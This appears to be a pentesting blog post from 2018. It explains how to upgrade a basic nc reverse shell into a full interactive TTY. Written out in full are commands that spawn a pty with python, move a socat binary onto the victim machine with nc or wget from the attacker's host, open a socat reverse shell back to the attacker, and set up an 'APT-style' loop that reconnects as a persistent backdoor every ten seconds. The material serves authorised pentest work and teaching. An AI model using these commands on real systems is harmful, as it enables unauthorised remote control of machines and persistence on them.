Methods to Upgrade nc Reverse Shells

May 16, 2018
pentesting shell

Ended up with a cheap nc shell and want to upgrade to a “real” shell with a proper TTY and navigation?

Say no more <:

1. Upgrading using shell magic

This doesn’t always work - however if Python is present on the victims machine, it’s worth a try.

  1. Use bash on the attacker machine, zsh doesn’t seem to work.
  2. Get the nc shell.
  3. In the shell, execute python -c 'import pty; pty.spawn("/bin/sh")' to allocate a TTY in the nc session.
  4. Execute export TERM=xterm-256color for proper color support.
  5. Put the shell into background using CTRL+Z.
  6. Configure the local shell using stty raw -echo.
  7. Execute fg to bring the nc shell back.
  8. Type reset and press enter.

Now a proper shell should be present which doesn’t close connections upon CTRL+C <:

If this didn’t work, try the next method:

2. Upgrading using socat

The tool socat can be used to create proper shell sessions. For this, a static binary of the tool is required which can be downloaded here.

First, transfer the socat binary to the victims machine using nc or wget:

The nc method:

a) Use nc -vvlp 1337 < socat to start a server which pushes the binary to the connecting machine.

b) On the victim, execute nc which downloads the file using nc <IP> <PORT> > /tmp/socat. You may manually stop the download process because it won’t terminate on its own.

The wget method:

a) Attacker: cd into the folder containing the binary and execute python -m SimpleHTTPServer <PORT>.

b) Use cd /tmp && wget http://<IP>:<PORT>/socat to download the file from the attackers machine.

After that, it’s time to spawn the shell:

  1. Create a socat listener on the attacking machine with socat file:`tty`,raw,echo=0 tcp-listen:4444.

  2. Spawn a proper reverse shell from the nc shell on the victims box using socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<IP>:4444.

Fixing width

In case the with of the shell is too small, it can be fixed like this:

  1. Using a new terminal, execute stty -a to display the amount of columns and rows being used normally on the attackers machine.
  2. In the (socat) shell use stty rows <num> cols <num> to fix the width.

APT-style persistence

Create a lazy backdoor shell on the victims machine:

while true; do sleep 10; socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<IP>:<PORT>; done &

In case a previous shell breaks, just set up a new listener to be up and running again without the need to run an exploit again. Or use tsh

Docker Breakout Using X11

May 18, 2018
docker pentesting hacking

2 Common Python Security Issues

May 13, 2018
pentesting python

Random Note #12354123: Easy Remote Pair Programming Using Docker and Tmux

April 10, 2018
randomnote docker vim tmux shell programming